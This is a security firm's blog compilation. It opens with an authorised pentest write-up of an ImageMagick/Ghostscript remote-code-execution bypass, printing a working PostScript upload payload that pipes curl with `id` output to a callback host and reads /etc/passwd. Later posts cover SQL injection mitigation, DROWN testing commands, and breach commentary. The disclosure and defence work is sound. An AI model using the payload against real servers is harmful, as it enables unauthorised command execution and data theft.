ImageMagick RCE Take 2

Introduction

A new bypass for GhostScript which ImageMagick uses by default for dealing with PostScript, was posted yesterday which allowed attackers to launch remote code execution. This is similar in nature to the ImageTragick bug which plagued ImageMagick where image files containing postscript were sent to ImageMagick and when converted, launched commands against the OS.

As part of our continuous security efforts for our clients, we watch for vulnerabilities that could affect them, and confirm with the clients when they are affected. This was one of those times.

We discovered one of our clients was vulnerable to this exploit. We wrote up the issue and submitted it to them within 24 hours of the issue being released to the public, which they were able to fixed in minutes.

Security Details / Walktrough

One of our clients uses ImageMagick to manage image conversions  to create things such as thumbnails for their website.

The following payload was used as an image upload across all the upload functions on the dev website:

Filename: test.jpg

%!PS

userdict /setpagedevice undef

save

legal

{null restore} stopped {pop} if

{legal} stopped {pop} if

restore

mark /OutputFile (%pipe%curl${IFS}callback.softwaresecured.com/`id`)

currentdevice putdeviceprops

From previous testing with the client we already knew which OS the application was running on, so we were okay using curl. While testing, we started with a call to nslookup, since this is on both Windows and Linux. We then uploaded this POC file to the clients website.

The upload request looks something like the following:

POST /file HTTP/1.1

Host: www.helloworld.com

…snip…

Connection: close

—————————–184561271817366

Content-Disposition: form-data; name=”file”; filename=”test.jpg”

Content-Type: image/jpeg

%!PS

userdict /setpagedevice undef

save

legal

{null restore} stopped {pop} if

{legal} stopped {pop} if

restore

mark /OutputFile (%pipe%curl${IFS}callback.softwaresecured.com/`id`)

currentdevice putdeviceprops

—————————–184561271817366–

Which gave back the following response:

HTTP/1.1 400 Bad Request

…snip…

Connection: close

{“errors”:{“image”:”Image is not valid”}}

On our server we watched the logs for the curl command coming from the clients web server, waiting to see if the user’s ID was included in the URL or not and if we even receive any call at all. After trying many different upload functions, here is the response we received:

GET /www-data HTTP/1.1
User-Agent: curl/7.35.0
Host: callback.softwaresecured.com
Accept: */*

Success! We have remote command execution on the clients web server and the user running the web service is “www-data”. Other commands that worked included:

  • uname -a
  • cat /etc/passwd
  • nslookup

Dangers of Insecure Defaults and Remediation

Luckily for the client, when we tried to cat the /etc/shadow file on the server, we received no data back. This means they run the web service as a lower privilege user.

As of the writing of this post there is now official fix. That being said there is an official workaround. It’s advised to update the policy.xml file which configures ImageMagick. The following is taken from the post on www.kb.cert.org:

Disable PS, EPS, PDF, and XPS coders in ImageMagick policy.xml

ImageMagick uses Ghostscript by default to process PostScript content. ImageMagick can be controlled via the policy.xml security policy to disable the processing of PS, EPS, PDF, and XPS content. For example, this can be done by adding these lines to the section of the /etc/ImageMagick/policy.xml file on a RedHat system:

  • <policy domain=”coder” rights=”none” pattern=”PS” />
  • <policy domain=”coder” rights=”none” pattern=”EPS” />
  • <policy domain=”coder” rights=”none” pattern=”PDF” />
  • <policy domain=”coder” rights=”none” pattern=”XPS” />

Timeline

  • Tue, 21 Aug 2018 05:46:26 -0700: Vulnerability Published
  • Wednesday, 22 Aug 2018 11:21:00 -0500: Vulnerability Confirmed on Client Website
  • Wednesday, 22 Aug 2018 12:26:00 -0500: Vulnerability Published to Client
  • Wednesday, 22 Aug 2018 13:08:00 -0500: Vulnerability Fixed on All Servers

References

Was this article helpful?

Our Security Assessment Process: Attack Simulation Approach

Attack Simulation Approach

The term security assessment is used to describe the process of auditing a system, such as a network or an application, for the purpose of finding security flaws that can lead to cyber attacks. There are several ways that to perform security assessments for a system.

At Software Secured, we follow an attack simulated approach, combining the latest hacking techniques, which are manually executed by our experienced engineers. In addition, we apply our unique process, checklists and hacking book, giving you the best coverage and depth in the industry.

We focus on optimizing on 3 factors:

1. Coverage: we use several techniques to automate the discovery of basic attacks. We continue pushing the boundaries of what tools are capable of finding,  giving us the chance to spend more manual testing time on finding harder to discover vulnerabilities, such as business logic vulnerabilities.

2. Depth: we follow a stringent process, combined with a checklist of 120+ security items that are reviewed in every assessment. Our checklist is continuously updated with the most recent techniques to ensure that as many code paths in the application have been tested.

3. Attack Simulation: we spend a fair amount of time understanding the business purpose of the application allowing us to go deeper and understand the attacker’s motivation. This uncovers potential vulnerabilities that are usually hidden.

Given our 3 areas of focus, we follow a 6 step process with every assessment:

1. Kickoff Meeting

We begin with a kickoff meeting with the client to understand the business purpose of the application, this helps us better understand who is most likely to attack the application.

2. Threat Modelling Exercise

A threat modelling exercise is performed next. Threat modelling breaks down the system and outlines how and where the attacker can pose a threat. The artifact of this step is a set of application specific test cases and attacks that are unique for the system under test.

3. Automation

We use best in class tools customized to fit the attack simulation process, combined with our proprietary tools and scripts to provide you with a more thorough assessment.

4. Attack simulation

Our security engineers apply their collective hacking experience combined with latest attack techniques to simulate what an attacker would do in a real life hacking scenario.

5. Coverage Control

Using our checklist which consists of over 120+ security checklist items, helps to ensure all bases are covered. This ensures that most of the application’s code paths are tested and maximum coverage is maintained for every assessment.

6. Reporting

finally, our team compiles the list of issues into an actionable report. Each issue is explained in detail along with the risk level associated with it, steps to reproduce, proof of concept, and detailed remediation steps.

Our attack simulated approach to security assessment can be delivered as a one-off engagement or continuously managed.

Introduction to SQL Injection Mitigation

What is SQL Injection?

The popularity of Structured Query Language (SQL) injection attacks has grown significantly over the years and employing relevant mitigation practices will help your application from being added to a growing list of insecure applications implicated in significant data breaches. Despite its release nearly 30 years ago, SQL injection has been responsible for millions of lost records with damages also in the millions, earning itself the #1 rung in the 2017 OWASP Top 10. In 2008 one such attack occurred when the Heartland Payment System (HPS) was compromised as a result of an SQL Injection vulnerability which exposed 138 million credit cards and caused $140 million in damages. Secure use of SQL could have prevented this.

SQL injection is an attack that occurs when specifically constructed input can provoke an application into misconstructing a database command, resulting in unforeseen consequences. Those consequences can include the circumvention of authentication and authorization mechanisms allowing the attack to add, modify, delete, and retrieve records compromising the integrity of a database and the applications it provisions.

Cultivating an environment which enables secure coding practices that prevent SQL injection vulnerabilities from making their way into an application is possible. Although this article focuses on outlining the technical practices which can prevent injection attacks, developing an organization-wide security minded culture should also be an objective. Education, design, and code review are just a few of the components within the Software Development Life Cycle (SDLC) that will contribute to an application’s ability to successfully defend itself from SQL Injection attacks and its overall success.

SQL Injection Mitigation Strategies

Secure Coding & SDLC

Security driven programming practices will always be the best defense against SQL Injection attacks. Ensuring developers are aware the the risks, tools, and the techniques which can mitigate SQL vulnerabilities is your first and best line of defense. However, cultivating the use of secure programming techniques will also require a commitment to their implementation throughout the SDLC. Developing security minded education, planning, testing, and review practices are just a few components within an SDLC that will help prevent SQL Injection vulnerabilities from making their way into your application.

Input Validation & Sanitation

Client side input sanitization and validation should only be considered a convenience for the end user, improving their user experience. For example, it could prove useful to provide feedback on a proposed username, indicating whether or not it will meet the application’s criteria. However, client side sanitization and validation can be bypassed, and as such, server side solutions should be employed.

Server side sanitization and input validation ensures data supplied by the user does not contain characters like single or double quotes that could modify an SQL query and return data not originally intended in the application’s design. Specifically, validation makes sure that user supplied data satisfies an application’s criteria while sanitization refers to the process which modifies user input in order to satisfy the criteria established by validation. Combining both results in a scenario where single quotations contained within a user submitted string are modified or removed as a result of sanitization and then validated ensuring single quotations are no longer present satisfying the application’s requirements.

Stored Procedures & Parametrization

Query parameterization occurs when stored procedures, defined as sub-routines an application uses to interact with a relational database management system (RDBMS), employ variable binding. Variable binding is a process which requires the definition of an SQL statement prior to the insertion of variables allowing for a clear delineation of code and user input. Essentially, prepared statements which parametrize queries protect the intent of an SQL query. For example, if an attacker were to submit the string ‘ OR ‘1’=’1 a prepared statement would literally attempt to match the string ‘ OR ‘1’=’1 to a field in the database, rather than evaluating the boolean expression.

// Stored Procedure Example (Java)
// Source: https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet

String custname = request.getParameter("customerName"); // This should REALLY be validated
try {
     CallableStatement cs = connection.prepareCall("{call sp_getAccountBalance(?)}");
     cs.setString(1, custname);
     ResultSet results = cs.executeQuery();		
     // … result set handling 
} catch (SQLException se) {			
     // … logging and error handling
}

Prepared Statements

Prepared statements are essentially serverside parameterized queries and when used with secure coding techniques, can produce equally secure code. Simply, the construction of a secure prepared statement results in the automatic parametrization of user input. However, the use of dynamically constructed queries should be avoided unless special libraries and techniques are used to protect against gaps in security coverage that might emerge. Libraries like opaleye for Haskell and SQL Builder for Python can be used to this effect. However, if dynamic SQL must be used proper sanitization and validation of user input will be necessary to safeguard an application.

The following code example uses a PreparedStatement, Java’s implementation of a parameterized query, to execute the same database query.

// Prepared Statement Example (Java)
// Source: https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet

String custname = request.getParameter("customerName"); // This should REALLY be validated too
// perform input validation to detect attacks
String query = "SELECT account_balance FROM user_data WHERE user_name = ? ";
PreparedStatement pstmt = connection.prepareStatement( query );
pstmt.setString( 1, custname);
ResultSet results = pstmt.executeQuery( );

Program Analysis Techniques & Proxies

Although the creation of secure SQL code should be your first priority, there exist tools that can facilitate the process. SQL specific static analysis tools like SQL Code Guard (https://www.red-gate.com/products/sql-development/sql-code-guard/) can analyze a database and its queries against a set of rules to reveal vulnerabilities. Other tools like SQLProb operate between an application and its database acting as a proxy which intercepts, analyzes, and discards potentially malicious queries before they reach the database. It should be noted that tools which rely on predefined patterns to identify malicious queries become less effective as their rulesets age and new attacks are discovered.

Final Thoughts

With the relative ease of executing SQL injection and their compelling consequences, their mitigation should be a priority for all application developers. With numerous defensive techniques and tools available in the form of stored procedures, parametrization, program analysis techniques, and even black box tools like OWASP’s Zed Attack Proxy, developers should have no trouble improving the security of their application and its users against SQL Injection attacks.

Recommended Reading

There is More to Application Security than Bulletproof Code

In recent months, momentum has been mounting for developers to write code for their applications that is more secure. While writing secure code is vital to the security of an organization, it’s not the final word in creating applications resistant to attacks.

A number of potential run-time flaws can be identified and corrected while source code is being written. Nevertheless, there may be errors in an application that can only be discovered when the application is running or under attack. Such errors may stem from code paths being taken given the current data and the current state of the application, how memory is used, how an application functions over time or even something as simple as how a program displays error messages.

When a developer reviews how their application is handling errors, they may see nothing insecure about the code and indeed, there may be nothing insecure about it. However, when the application runs and an error is produced, the message explaining the error may be creating a security risk that wasn’t apparent to a programmer concentrating on code alone.

Error messages need to negotiate narrow straights. They need to be meaningful to a user and give support staff diagnostic information needed to correct the errors but not give too much information to a hacker. For example, when a user commits an error when logging into a system an error message such as “User Name Correct, Password Incorrect” is to a hacker what a Milk Bone is to a dog. Instead of making the attacker wonder if the credentials they’re trying to use are any good at all, they know they’ve got a valid username and need to focus on cracking the password. Better yet, the attacker can use stolen credentials to attack new targets, the only piece of information needed is the username/email.

Open Source Headache

3rd party dependencies and particularly open-source continues to be a security headache. Securing native code alone also isn’t enough to protect applications because developers don’t completely control all the code used by their programs. Up to 90 percent of an application can be made up of third-party components. A developer can write rock-solid secure code for their apps but they still don’t know how secure those third-party components are. Many of those components contain open source code with flaws. It’s estimated that 50 percent of the world’s largest companies use applications built on open source components with vulnerabilities.

Vulnerabilities in open source components can be a real problem for developers, especially developers of web applications. “Component vulnerabilities can cause almost any type of risk imaginable, ranging from the trivial to sophisticated malware designed to target a specific organization,” the Open Web Application Security Project noted at its website. “Components almost always run with the full privilege of the application, so flaws in any component can be serious.”

Making matters worse, OWAAP continued, development teams don’t focus on keeping the components and libraries they use up to date. “In many cases, the developers don’t even know all the components they are using, never mind their versions,” it added. “Component dependencies make things even worse.”

What’s more, unlike commercial software makers who keep their customers apprised of recently discovered flaws and push fixes to them, most organizations don’t have a reliable way of being notified of Zero Day vulnerabilities or available patches about open source components.

Middleware and Config Vulnerabilities

Not only do apps work with vulnerable components, but may also be called on to work with middleware. Middleware is useful because it mediates network services to applications through devices like web and application servers. However, middleware can create its own security problems, problems that won’t be apparent by code review alone of an application.

For example, if an application contains authentication and access privilege control problems with the middleware, that won’t be discovered until the application runs and interacts with the middleware. The same is true for potential security vulnerabilities that could lead to interception or viewing of information in a workflow or the integrity of transactions on the network.

Errors in configuration files can be another fertile area for vulnerabilities that won’t become apparent by securing code alone. A programmer can be very meticulous about security, but if their application is misconfigured it can be as vulnerable as a sloppily coded one. Moreover, the problem can be exacerbated by many configuration settings defaulting to values that introduce vulnerabilities into the application or the middleware it’s using.

Making matters worse, web application config files can be changed at any time — even after an application is in production. A well-meaning administrator could open an application to attack by diddling a config file.

Any organization concerned with protecting its information assets needs its development teams to write secure code, but it can’t stop there. It has to test apps  as they’re running, too.

How to Confirm Whether You are Vulnerable to the DROWN Attack

Another OpenSSL vulnerability has been uncovered. The new vulnerability is one in yet a series found lately in the OpenSSL library, a toolkit implementing SSL v2/v3 and TLS protocols with full-strength cryptography world-wide.

The library which powers about 5.5 million websites has seen several vulnerabilities lately including a few blockbusters like Heartbleed, Shellshock and others. The new DROWN vulnerability follows the same pattern as its predecessor by getting its own website and logo here https://drownattack.com/

You are vulnerable if one or both of the following conditions is true:

1. A server in your network “enables” traffic over SSLv2
2. Another server that enables “SSLv2” shares a key with a server that does not.

At Software Secured we provide managed web application security services. We focus on continuously testing web applications against security flaws such as OWASP Top 10 and more. Our services also entail notifying clients against zero-days in 3rd party libraries used by applications. As part of this service, we started the Software Secured standard procedures to confirm any reported vulnerabilities.

The DROWN team provided a utility http://test.drownattack.com to help test whether domains are vulnerable, but we found this tool to report too many false positives. So Software Secured has documented an alternative process to confirm whether you are vulnerable to DROWN.

Here are the steps you need to follow in order to independently confirm whether you are vulnerable to the DROWN attack.

1 – You need to do the following with all your externally available services that could be communicating over SSL (e.g. Web, FTP, SMTP, etc). We assume that you have an inventory of all your public IPs. Just in case you don’t, one way to do that is using DNSRecon

dnsrecon

2 – For each IP, you need to list all the services that communicate over SSL. First, list the open ports per IP:

nmapports

3 – Ensure that you have SSLv2 supported as most openSSL distributions disable SSLv2 and SSLv3 (as they should), thanks to Dan Astor for the tip. One quick way to test is force an SSLv2 connection to the domain in question.

nosslv2

If you get this error: “unknown option -ssl2” then you don’t have SSLv2 enabled locally. This would give you false positives as your local openSSL client wouldn’t be able to negotiate an SSLv2 connection with the server even if the server has it enabled. To enable SSLv2, please follow the instructions here: http://forums.kali.org/showthread.php?98-Adding-support-for-SSLv2-for-SSLScan-and-OpenSSL-testing

4 – So to double check the results, we used SSLyze to check. Bingo, the service at this IP does support SSLv2 ciphers:

sslyze

5 – Using openSSL itself also confirms the results using the commend: openssl s_client -connect 66.6.224.76:443 -ssl2

Conclusion:

  1. Keep in mind that this vulnerability is in a protocol that was deemed problematic at least 20 years ago.
  2. This vulnerability is more problematic if one of the servers in the network supports the faulty version. This can be used to intercept traffic to other servers that aren’t supporting it.
  3. Although Software Secured found a very high ratio of false positives using the DROWN team’s check utility versus our own testing labs, it is highly recommended you don’t take any chances and test your own server.
  4. Make sure to test ALL your servers including web servers, mail servers, FTP server etc.

Update:

Some readers indicated that it is possible to exploit this vulnerability even if SSLv2 was disabled. Merely supporting SSLv2 could potentially be problematic, so I decided to clear out with the DROWN team and I sent the following email:

Nice work. I just had a quick question. In order for a server to be vulnerable, one of the following conditions must happen:

1. The server “enables” SSLv2
2. Another server that enables “SSLv2” shares a key with the server that does not.

If all the servers in a network didn’t enable SSLv2, then the vulnerability can’t be exploited, can you confirm?

And received the following reply 40 minutes after:

yes this is correct.
But note that even a single SSLv2 enabled server (running on a different
port or IP) using the same RSA key makes your server vulnerable.If you can confirm that all your servers are configured correctly to
disable sslv2, you are OK.

Setting Up a Secure Instance of Express JS (GitHub Repo)

In a previous blog post I mentioned ways to secure your ExpressJS instance. This included both using third party modules and modifications to the default configuration of Express.

The blog post received great feedback, so we decided to create a skeleton that showed how to handle the security concerns addressed. The skeleton is a great starting point for a secure ExpressJS application and this post will cover the details getting started with it and what it covers for you out of the box.

The source code for the skeleton can be found here dead-simple-express.

Check out the secure branch for all the details.

Getting Started

The following instructions are done with an OSX machine in mind, so modify accordingly.

Make sure to have mongodb installed.

brew install mongodb

To use:

git clone https://github.com/jeremybuis/dead-simple-express.git && cd dead-simple && rm -rf .git
npm install
bower install
npm start

Navigate to http://localhost:4000 to view the basic page, keeping in mind its a starting point project, so things are pretty bare.

What you get in the skeleton:

  • A rock solid starting point for writing an ExpressJS server side webapp
  • Sane defaults which includes express configurations and security focused configuration.
  • Logical app structure which has a nice separation of concerns between files
  • Proper error handling.
  • Security minded modules to handle issues addressed in last blog post
  • Build script for super dev powers using Gulp.

Security issues it covers:

  • Cross-site Request Forgery (CSRF)
  • Security headers using helmet
  • HPP or HTTP Parameter Pollution
  • Content length validation
  • Downgraded user privileges
  • Secure cookies
  • Proper env variable loading
  • Removal of x-powered-by header
  • Generic cookie name
  • User accounts with bcrypt password handling

Recommended Setup

My preference to set something like this up in production is to put your express server behind a nginx proxy.

The proxy handles ssl termination and routes traffic to your express server. It also handles serving static resources. This way your express app is only handling app specific routes that have business logic attached to them.

This setup allows you to not run the express instance as root as it doesnt need to be bound to a port lower than 1024.

Thats all for now folks.

The Canadian Government Outage and Raising Profiles of Simples Attacks

The Canadian Govt was hacked! The Globe And Mail reported a few days back:

A cyberattack crashed federal government websites and e-mail for nearly two hours Wednesday – an incident that raises questions about how capable Ottawa’s computer systems are of withstanding a sustained assault on their security.

It is not news that cyber attacks are being used for more than just stealing information. Showing defiance and protesting like what Anonymous and the Syrian Army is doing every now and then is another example. Hacking is also used for intelligence gathering, spying, public humiliation, and much more.

The question is: are attackers getting better at attacking? or we getting worse at defending?

The answer is complicated but attackers are definitely getting better. Not only do they get better in terms of skills and tools. But they are also getting smarter and more sophisticated, the most interesting thing is that they are raising the profiles of the same old attacks.

There are hardly any new attacks nowadays that we never knew they existed before, maybe once in a while a new technique of old attacks. What we are mostly dealing with is same old attacks but given sophistication, complexity, or facelift. There are several things that raises the profile of an attack, from an ordinary attack to something that makes the headlines every where.

Please keep in mind that I am not discussing state sponsored attacks here because I think this is a league of its own and most organizations can’t prevent these kind of attacks.

1. The Target: “Go Big or Go Home” is definitely valid in the hacking world. The primary factor of raising the profile of an attack is the target attackers are after, or the organization the attackers exposed. The IRS attack last month was definitely a big deal. The breach that caused the identity of every single federal employee to be stolen, RSA attack was another high profile because of the target, and in this case it was the seed for the infamous encryption that is used by a lot of Government organizations as a two-factor authentication (SecurID)

2. The timing of the attack: Distributed Denial of Service is a very simple attack. Imagine tens (or hundreds) of thousands of browsers sent and kept sending requests to the exact same set of servers at exactly the same time. What is going to happen? These servers will go down for sure because they can’t handle this kind of traffic. Attackers can do that by controlling Botnets. As a matter of fact, Botnets are available for rent for as little as $200-$300 a day! Every single Federal or Provincial faces a ton of attacks every single day. What made this particular attack against the Canadian Government very visible worldwide is the timing:

A. Bill C51 just passed in the House of Commons.

B. The Federal Elections are up and coming in October of this year. Perfect timing for visibility for the Group Anonymous.

3. Combining Attacks: It is not new that attackers combine several hacking techniques in a single attack. It is typical that attackers launch a multistage attack where they first gain a foothold inside the organization probably through an unrestricted zone (marketing, DMZ, etc) and use that to elevate their foothold and gain privileges to other more restricted zones until they get to what they are looking for. It is common too that malware exploit several vulnerabilities or zero-days in a system. The best example is Mickey Mooney’s worm that hit Twitter in 2009 and leveraged a combination of Cross-site Scripting and Cross-site Request Forgery. What we are seeing more these days is the amount of zero-days used, and the speed by which zero-days are used in the wild. It was reported that attackers exploited the Drupal SQL Injection back in November 2014 8 hours after the initial disclosure, 8 hours is not enough for most organizations to take any kind of action or even get in some cases get notified about the attacks.

4. Branding of Attacks: Remember Heartbleed? it was a simple bug where the code did not check the boundaries of the buffer allocated and thid led to attacker gaining access to unencrypted server’s memory, the best explanation is found in this cartoon. Now, why did it make the headlines and why it was such a big deal? It indeed affected half a million website, but I don’t think this was the main reason. Here is my proof; Drupal suffered a massive SQL Injection attack few months after that affected about 12 Millions sites and the impact is grave where attackers could get a shell on the server which in security terms means “Game Over”, attacker wins. So as far as impact and reach the Drupal attack definitely had more impact and reach. Now ask 100 people in different departments of any organization, chances are more people will remember Heartbleed and very few will remember or even recognize the Drupal SQL Injection attack. Why? Heartbleed had a name, and a logo. It has a brand!

5.  Branding of Attackers: 10 years ago all the bad guys were labeled either hackers or blackhat. Now that hacking got mainstream, attackers are grouped either they name themselves or they are given a name. There are Hacktivists such as the Anonymous group which mainly protest issues related to free speech, human rights, or freedom of information. Syrian Electronic Army is a group that claims responsibility for defacing or otherwise compromising scores of websites that it contends spread news hostile to the Syrian government or fake news. APT (Advanced Persistent Threat) while not a group, it is a name given to a specific style of  hacking used by state sponsored attackers, but it is usually attributed to Chinese attackers.

Now, that attackers are getting better, organizations’ defences must get better too. And there are several things that organizations could go to protect themselves against these kind of attacks:

1. Threat Assessment: the very first step organizations should do is to understand who are their primary adversaries? Who is the most likely to attack your organization, what does this attacker look like, what are their capabilities, what are they looking to do? what kind of tools and skill set do they usually have? Answering these questions will focus your efforts on what should be done and more importantly what should not be done.

2. Defence in Depth: we can’t stress enough on the importance of defence in depth. When you go on a business trip, you check in to your hotel room, how many locks do you secure before you go to sleep? …….. all of them! why? one is not enough? The truth is, there is no perfect security system, but the more good security controls used the harder it is for the attacker to infiltrate your system. The harder it is for the attacker to infiltrate, the less motivated the attacker would be to attack you versus the next target. The harder it is for the attacker the more time it is going to take the attacker if they are really after you, the longer it takes them to exploit your organization, the higher the chance your intrusion detection systems will notify you and you take an action in time.

3.  Cyber Security Strategy: security is not only an IT problem. It is a business risk. Without an organization wide strategy that covers everything from Governance, architecture, design, implementation, testing, deployment and testing; security will remain an IT problem, a problem that is much bigger than just IT. Therefore, the defences will always remain short regardless of the budget thrown at it.

4. Continuous Assessment: attackers are pounding your defences on a daily basis to find holes, crack them, see what they can get and what they can do with it. Best organizations do that proactively themselves leaving nothing for attackers to find. Test your own defences, push them to the limit because if you don’t, hackers will.

Reading through the IRS Hack: Failures and Analysis

IRS has reported that  thieves stole tax information from 100,000 taxpayers, pretty disturbing news on multiple levels. The first level of disturbance is obviously that an organization like the IRS which has more information on every single citizen – probably more than the citizens know about themselves – got hacked with that magnitude of a data breach is something to worry about. The other interesting level is that the attackers already had the victims’ Social Insurance Numbers, address information, date of birth and tax filing status.

The “Get Script” feature was taken-off line temporarily after the attack, so we didn’t have a chance to look at it closely. However, several resources are available online that pretty much sums up how it works.

Several Notes on The Application’s Security Design and Architecture:

1. Authentication Failure: Good authentication requires more than one of the following: “Something You Know”, “Something You Have” and “Something You Are”. Brief description of these are found here. IRS used 4 “Something You Know” factors, beyond the Social Security Numbers; The Address, Date of Birth and Tax Filing Status don’t really add much security. Apparently, the attackers didn’t even have to guess as they already knew this information. The question here is if they already knew what they are stealing, so what’s the point? This question will be answered later with more to come in the analysis section

2. Lack of Proper Attack Resistance Capabilities: Attack resistance is the application’s capability of preventing the attacker from executing an attack against it. To be fair; very few applications get this right and most organization outsource this to perimeter security and intrusion detection tools in particular. It was reported that IRS had several IP filters preventing requests after several “hundreds” of requests have been made from the same IP. A problem with this technique is that it does not work because attackers can randomize their IPs. While IPs are still important in detecting automated attacks, timing and geolocation are also important factors.

3. Using Predictable Data in Authentication is Bad: Using the Social Security Number as part of the authentication process is a big no-no in sound  security architecture practices for several reasons: first, the possible valid social security numbers are limited, there are several websites that explain the structure of a valid Social Security Number and others that will help you generate valid ones. So generating valid ones is extremely simple. Now, most probably the attackers didn’t go that route and they got this data from somewhere else. Nonetheless, using a predictable data in the authentication process is definitely a bad idea. Additionally, having the user to enter their Social Security Number in there could raise a bunch of other issues such as: caching, shoulder surfing and more.

Why Did They Do It?

Again, the big question is: if the attackers already had the victim’s Social Security Number, Data-of-birth, address and filing status, then what’s the point? what else could they gain from this hack? The answer is a lot…

1. Better Price for the Data: It turns out that a Social Security Number is only worth something ($3 – $5 each According to CNNMoney) if it was packaged with a Full Name. Assuming the attackers stole the PII (SSN, DoB, and Street info) but they didn’t have the victim’s names, full address and marital status, guess where they would find  this information? In the Transcripts, the image below shows a sample transcript which shows all the data the attackers would need to make a good sale of about $300,000 – $500,000.

2. Fraud: IRS reported the following:

“In all, about 200,000 attempts were made from questionable email domains, with more than 100,000 of those attempts successfully clearing authentication hurdles,”

This is a 50% success ratio (100K success out of 200k trials), so could this have been a data cleansing operation? This information was  stolen from somewhere but it didn’t have enough information to perform a full scale fraud operation. IRS paid identity thieves $5.2 billion in 2011 alone and according to The Chicago Tribune:

“The agency is still determining how many fraudulent tax refunds were claimed this year using information from the stolen transcripts. Koskinen provided a preliminary estimate, saying less than $50 million was successfully claimed.”

3. Identity Theft:
With almost all the information a thief needs to steal someone’s identity; nothing stops them now from  launching identity theft attacks. Adding insult to injury; according to the 5th annual study conducted by the Ponemon Institute, a Michigan-based research center, medical identity theft rose sharply in 2014, with almost half a million reported incidents. The compromise of healthcare records often results in costly billing disputes. Ofcorse regular identity theft is also a possibility but the high success ratio (100,000 successful attempts out of 200,000) suggests that the data used was fresh which brings to mind the Anthem Health Insurance Hack.

The bottom line is it does not have to be like this; these attacks could be avoidable with simple or with our more  comprehensive  security approaches. The billions lost to attackers and fraudsters could be put to other good use with only a fraction of that amount spent on security in the first place rather than covering up and dealing with the damage.